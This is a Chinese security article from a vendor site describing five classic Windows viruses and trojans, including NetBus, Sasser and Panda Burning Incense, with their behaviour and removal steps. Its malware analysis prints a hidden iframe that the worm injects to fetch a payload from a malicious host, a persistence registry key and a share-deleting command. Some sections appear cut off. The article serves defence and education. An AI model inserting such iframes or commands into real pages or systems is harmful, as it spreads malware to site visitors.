购买支持1
购买支持2
综合支持1
技术支持1
技术支持2
技术支持3
| 摘要:局域网安全和内网数据安全:常见五类典型病毒介绍,典型病毒介绍,特洛伊木马,NetBus,震荡波病毒,求职信病毒,灰鸽子木马病毒,熊猫烧香病毒
|
局域网安全和内网数据安全:常见五类典型病毒介绍 |
|
|
1.特洛伊木马——NetBus NetBus是一个和著名网络攻击程序Back Orifice类似的网络特洛伊木马程序。它会在被驻留的系统中开一个“后门”,使所有连接到Internet上的人都能神不知鬼不觉地访问到被驻留机器,然后控制者可以恶作剧地随意控制你的鼠标,在你机器上播放声音文件,或者打开你的光驱等,更危险的当然是删除你的文件,让你的机器彻底崩溃。 NetBus由两部分组成:客户端程序(netbus.exe)和服务器端程序(通常文件名为:patch.exe)。要想“控制”远程机器,必须先将服务器端程序安装到远程机器上(如:通过远程机器的主人无意中运行了带有NetBus的所谓特洛伊木马程序)。 特别是NetBus 1.70,它在以前的版本上增加了许多“新功能”,从而使它更具危险性,如NetBus 1.60只能使用固定的服务器端TCP/UDP端口:12345,而在1.70版本中则允许任意改变端口号,从而减少了被发现的可能性;重定向功能(Redirection)更使攻击者可以通过被控制机控制其网络中的第三台机器,从而伪装成内部客户机。这样,即使路由器拒绝外部地址,只允许内部地址相互通信,攻击者也依然可以占领其中一台客户机并对网中其他机器进行控制。 通常,NetBus服务器端程序是放在Windows的系统目录中,它会在Windows启动时自动启动。该程序的文件名是patch.exe,如果该程序通过一个名为whackamole.exe的游戏安装潜伏的话,文件名应为explore.exe或game.exe。可以检查Windows系统注册表,NetBus会在下面路径中加入其自身的启动项: "\HKEY_LOCAL_MACHINESOFTWARE\Microsoft\Windows\CurrentVersion\Run" NetBus通过该注册项实现Windows启动时的自动启动。但如果你按Ctrl+Alt+Del组合键,在任务列表中是看不到它的存在的。正确的去除方法为:
有些木马程序在种木马的同时,感染系统文件,所以即使用以上方法去除了木马,系统文件被运行后,会重新种植木马。即使是防病毒软件,也不一定能彻底清除。 2.震荡波病毒 (1)病毒描述 Sasser病毒,中文名为“震荡波”病毒,也有人称之为“杀手”病毒,这是一种蠕虫病毒。它利用微软WindowsNT内核平台上的LSASS漏洞,随机的扫描其他网络中计算机的IP端口,然后进行传播。 (2)病毒清除 第一步:http://www.microsoft.com/china/technet/security/bulletin/ms04-011.mspx下载相应的漏洞补丁程序,断网安装。 3.求职信病毒 Worm.Klez.L是一种蠕虫病毒,病毒体内包含大量加密字符串。由于此病毒能提升自身的运行级别,使得一般程序无法结束或访问它的进程,包括Windows自带的任务管理器。因此无法手工清除此病毒。 病毒在得到运行后,首先提升自身的运行级别,然后将自己复制到Windows系统目录下,文件名总以Wink开头,同时还会放出一个小病毒体(Win32.Foroux.exe),最后分别运行它们并退出。当病毒被自己再次运行时,它会发现自身已处于系统目录下,此时病毒运行线路发生改变,它不再复制自身,而是创建7个病毒线程,并以系统服务的形式驻留内存。 Worm.Klez.L的最大特点在于其抑制杀毒软件的能力大为提高,甚至包括一些著名病毒(它的早期版本),只要是阻碍Worm.Klez.L传播的软件它都不放过。它通过注册表和内存两方面破坏这些软件。 更可恶的是Worm.Klez.L还把此进程所对应的程序文件也给删除了。由于杀毒软件和某些工具的代码块或数据块中常包含此类字符串。并且病毒每次轮询的间隔只有64毫秒(加上搜索的时间也不过几秒)。在它之后启动的杀毒软件在单击杀毒按钮前就已被干掉,以至于无法带毒杀毒。 4.灰鸽子木马病毒
(2)病毒的手动清除
打开 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services注册表项,查找“game.exe”,可以找到灰鸽子的服务项如Game_Server,删除整个Game_Server项。 删除灰鸽子程序文件。 在安全模式下删除Windows目录下的Game.exe、Game.dll、Game_Hook.dll以及Gamekey.dll文件,然后重新启动计算机。 (3)防护手段 给系统安装补丁程序。如MS04-011、MS04-012、MS04-013、MS03-001、MS03-007、MS03-049、MS04-032等。 给系统管理员账户设置足够复杂足够强壮的密码;禁用/删除一些不使用的账户。 及时更新杀毒软件的病毒库。 关闭一些不需要的服务,条件允许的可关闭没有必要的共享,也包括C$、D$等管理共享。完全单机的用户可直接关闭Server服务。 不要随便打开或运行陌生、可疑文件和程序,如邮件中的奇怪附件,外挂程序等。 安装灰鸽子(Huigezi、Gpigeon)专用检测清除工具。
(1)病毒描述 “武汉男生”,俗称“熊猫烧香”,这是一个感染型的蠕虫病毒,病毒进程为“spoclsv.exe”。它能感染系统中exe,com,pif,src,html,asp等文件,它还能中止大量的反病毒软件进程并且会删除扩展名为gho的文件,(.gho为GHOST的备份文件),使用户的系统备份文件丢失。被感染的用户系统中所有.exe可执行文件全部被改成熊猫举着三根香的模样。“熊猫烧香”发作时的表现见图3-7。 (2)病毒详细行为
创建启动项: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]"svcshare"="%System%\drivers\spoclsv.exe"; 在各分区根目录生成病毒副本:X:\setup.exe、X:\autorun.inf; 使用net share命令关闭管理共享: cmd.exe /c net share X$ /del /y 修改“显示所有文件和文件夹”设置: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL] 病毒尝试关闭安全软件相关窗口; 尝试结束安全软件相关进程以及Viking病毒(威金病毒)进程; 禁用安全软件相关服务; 删除安全软件相关启动项; 遍历目录修改htm/html/asp/php/jsp/aspx等网页文件,在这些文件尾部追加信息: <iframe src="hxxp://www.ctv163.com/wuhan/down.htm" width="0" height="0" frameborder="0"> </iframe> 在访问过的目录下生成Desktop_.ini文件,内容为当前日期; 此外,病毒还会尝试删除GHO文件,尝试使用弱密码将副本以GameSetup.exe的文件名复制到局域网内其他计算机中。 病毒文件内含有这些信息: whboy ***武*汉*男*生*感*染*下*载*者*** (3)解决方案 结束病毒进程%System%\drivers\spoclsv.exe,查看当前运行spoclsv.exe的路径,可使用超级兔子魔法设置。 删除病毒文件%System%\drivers\spoclsv.exe 删除病毒启动项: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]"svcshare"="%System%\drivers\spoclsv.exe" 通过分区盘符右键菜单中的“打开”进入分区根目录,删除根目录下的病毒文件:X:\setup.exe、X:\autorun.inf 恢复被修改的“显示所有文件和文件夹”设置: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL] 修复或重新安装被破坏的安全软件。 修复被感染的程序。可用专杀工具进行修复,如金山熊猫烧香病毒专杀工具、安天熊猫烧香病毒专杀工具、江民熊猫烧香病毒专杀工具和瑞星熊猫烧香病毒专杀工具等。 恢复被修改的网页文件,可以使用某些编辑网页的工具替换被添加文字为空。机器上有htm/html/asp/php/jsp/aspx等网页文件,一定要删除此段代码。有危险代码的网页一旦发布到网页可能会感染其他用户。 |
|
作者: AnyView(网络警)网络监控软件 时间: 2009-2-19 14:37:31 点击:
|
|
相关资讯:
|
首页 |
著名局域网网络监控软件介绍 |
最好的QQ聊天记录内容监控软件 |
上网行为监控软件购买
Copyright © 2000-2024 Amoisoft.com 厦门天锐科技股份有限公司 版权所有 E-MAIL:Sales@Amoisoft.com
闽ICP备06031865号-3
闽公网安备 35021102001279号
官方下载1